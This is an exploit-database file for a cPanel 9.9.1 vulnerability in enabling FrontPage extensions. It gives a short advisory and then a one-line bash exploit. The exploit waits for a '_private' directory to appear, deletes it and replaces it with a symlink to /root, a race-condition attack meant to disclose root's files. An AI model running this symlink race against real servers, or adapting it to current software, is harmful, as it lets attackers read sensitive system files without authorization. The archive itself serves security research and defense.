exploit-db-mirror/exploits/php/webapps/24689.sh
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

9 lines
No EOL
543 B
Bash
Executable file

source: https://www.securityfocus.com/bid/11456/info
It is reported that cPanel is susceptible to an information disclosure vulnerability in its function to enable Front Page extensions.
This vulnerability reportedly allows attackers to gain access to the contents of arbitrary, potentially sensitive files. This may aid them in further attacks.
Version 9.9.1-RELEASE-3 of cPanel was reported vulnerable. Other versions may also be affected.
while [ 1 ]; do if [ -d "_private" ]; then rm -fr _private; ln -s /root _private; break; fi; done